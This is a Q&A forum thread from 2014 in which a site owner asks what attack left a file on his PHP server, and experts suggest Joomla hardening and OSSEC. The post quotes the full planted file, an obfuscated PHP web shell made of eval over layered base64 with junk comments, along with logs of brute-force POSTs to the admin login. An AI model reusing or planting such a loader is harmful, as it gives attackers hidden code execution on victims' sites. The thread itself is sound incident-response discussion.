Solved

What kind of a hack is this?

Posted on 2014-12-23
5
250 Views
Last Modified: 2014-12-23
I had a bunch of PHP files messed up yesterday by some script.  The common thing is they had 666 permissions rather than 644.  But ... still ... a script had access to mess the files up.

This morning I find these lines in one of the logs:
114.246.132.143 - - [23/Dec/2014:00:05:06 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1"

223.99.189.102 - - [23/Dec/2014:04:03:17 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"


And the PHP file in question is this:

<?php /*m\i2s-*/eval/*Ad?K8s*/(/*jHF&*/base64_decode/*(~G+z*/(/*=32*/'Lyp6OTNaYn0qL2V2YWwvKjNZezMqLygvKjcuSz1pWyovYmFzZTY0X2RlY29kZS8qRHFHeyovKC8qLno2K'/*ueL<*/./*6 qH*/'WVFWiovJ0x5cE1VM3RUSmlvdmFXWXZLa0EyZlc5UWZpb3ZLQzhxWicvKlE/c3IwaiovLi8qOnxASCovJ1'/*HnRA*/./*Cdlj=.*/'ZGK0tpOXBjM05sZEM4cU0yWWhZaTVZWkNvdktDOHFYMScvKl9pfTVSR3oqLy4vKmpxdH02Ki8nMUtLaTh'/*!.R5*/./*ehZS%*/'rWDFKRlVWVkZVMVF2S2w4bUxEOUpVeW92V3k4Jy8qIW9KdUQqLy4vKm97NEcqLydxSVRFd1VWOHdXU292'/*PKlM}%*/./*n{*/'SjNrbkx5b3RleWhxY3k1QUtpOHUnLypLVy58Wi0qLy4vKkk5WnFdW0gqLydMeW9zS0d3cEtpOG5aeWN2S'/*<o!}3*/./*}en~p*/'240OFZtc3FMeTR2S24xdFAnLyorWDB7ciovLi8qVVJMdSovJ2xoTE15b3ZKM2tuTHlwN1MxeDdkeW92TG'/*E;4=]*/./*(9S*/'k4cUlHMXBVbCcvKmR4a25EayovLi8qN3VCKi8nb3FMeWQ0Snk4cVRqazVLaTh1THlwcWJERitVellxTHl'/*{HYT2t*/./*;0UAF9*/'kJy8qVF9ePDMqLy4vKkF3RGIqLydrSnk4cVRIQmhOU292WFM4cU9YazFTRlVxTHk4cWFqNWwnLyowMjd0'/*_R|W*/./*f-KQq_*/'Ki8uLypJY099IFRyKi8nVlY0cUx5a3ZLbTQwTFc0cUx5OHFOVlZOYm1SYUtpOHBMJy8qR25IeCovLi8qO'/*hc]4b*/./*K^oB5y*/'nlvbEAqLyd5cFZlazl2YlhFcUwyVjJZV3d2S2poK0prMGhTeW92S0MnLyogaChbc3pUNSovLi8qeWllcW'/*X(4J:@*/./*5,>*/'tyUCovJzhxUURaZVF5b3ZjM1J5YVhCemJHRnphR1Z6THlweElGQScvKjNmVWhUKi8uLypeMngzKi8nc0x'/*s:@*/./*gf=*/'pb3ZLQzhxT0U1ek1WZ3lZQ292SkY5U1JWRlZSVk5VJy8qLEJxPTVwaSovLi8qTilTMCUqLydMeW9oVVZo'/*b>x]*/./*>|TG*/'b1Fsd3FMMXN2S2lWN1p6Z3pLaThuZVNjdksnLypgRzhOZlcqLy4vKiVZNSovJ2tjaFhqQXFMeTR2S2xGd'/*t|qE5*/./*(}XycS*/'FlrOHNLaThuWnljdktrZzZiUycvKkt4WkElSEgqLy4vKjB+VS0qLydvdkxpOHFRSEZZYkRVcUx5ZDVlR1'/*[:I*/./*:bP*/'FuTHlvaGZTaFNLaTknLyp9KF9yUiovLi8qTW5VZGsuXSovJ2RMeXBYT25wRFlGa3FMeThxTWljc1czNXZ'/*wEy93*/./*?0{^*/'LaThwTHlvZycvKlVSXWJ0Ki8uLypJaS4qLydYVUk0VWlvdkx5bzVLWGw0Y0NvdktTOHFVbXRpVnp0OUsn'/*u}C*/./*5_D0*/'LypJUWZ4Ki8uLyp7LHsxeTgqLydpOHZLa1ZmYlc4NVFrQlVLaTg3THlwWWFubGVjU2h3YVNvdicvKkEnJ'/*!ja*/./*~J_n*/'05SXHhqKi8pLyopK215PSovLypzMC1nWztJKi8pLypZXHQ1ZlEqLy8qcEVRZ0xbXyovOy8qfEo0LT8qLw=='/*uRn34*/)/*kzY!*//*JJD*/)/*:@uW*//*BN9T*/;/*ZTX%*/ ?>

Open in new window


What kind of attack is this? I want to correct more completely than just locking down the permissions so that the script doesn't work.

Of course, I'll delete the PHP file, but ... there's a vulnerability involved that allowed the file to be placed there.  I want to close that down.

Thanks.
0
Comment
Question by:Daniel Wilson
  • 2
  • 2
5 Comments
 
LVL 58

Expert Comment

by:Gary
ID: 40514876
What are you running?
Wordpress or similar?
The contact form is the usual way to hack if it was done through the website or one of the plugins/vulnerabilities of WP et al
Otherwise you need to check the server logs for SSH/FTP brute force attacks
0
 
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514886
There is one Joomla site ... though most are hand-coded PHP.

Thanks for the tip ... I'll look harder at some of those other logs.
0
 
LVL 58

Accepted Solution

by:
Gary earned 500 total points
ID: 40514888
Joomla would be the one I would be looking at with stern eyes.
0
 
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514900
Looks like it's been quite a target.  I have hundreds of lines like this from one IP in the same day.

91.200.12.21 - - [03/Nov/2014:23:20:35 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:35 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:36 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.200.12.21 - - [03/Nov/2014:23:20:36 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

Open in new window

0
 
LVL 35

Expert Comment

by:gr8gonzo
ID: 40514976
If you have root access (e.g. dedicated server, VPS, etc), then try using OSSEC to help secure your site against random attacks like this.

Here's a good tutorial on how to set it up:
http://hackertarget.com/defending-wordpress-ossec/

The tutorial is geared towards Wordpress but OSSEC is a general-purpose security application:
http://www.ossec.net/
0

Featured Post

Microsoft Certification Exam 74-409

Veeam® is happy to provide the Microsoft community with a study guide prepared by MVP and MCT, Orin Thomas. This guide will take you through each of the exam objectives, helping you to prepare for and pass the examination.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
php56-php-mcrypt for rhel7 php56 1 100
Simple function not working 7 43
issue with DB import 1 36
How do you retrieve results from a PDO Array using this format? 5 42
3 proven steps to speed up Magento powered sites. The article focus is on optimizing time to first byte (TTFB), full page caching and configuring server for optimal performance.
One of the biggest threats facing all high-value targets are APT's.  These threats include sophisticated tactics that "often starts with mapping human organization and collecting intelligence on employees, who are nowadays a weaker link than network…
Learn how to match and substitute tagged data using PHP regular expressions. Demonstrated on Windows 7, but also applies to other operating systems. Demonstrated technique applies to PHP (all versions) and Firefox, but very similar techniques will w…
The viewer will learn how to count occurrences of each item in an array.

713 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question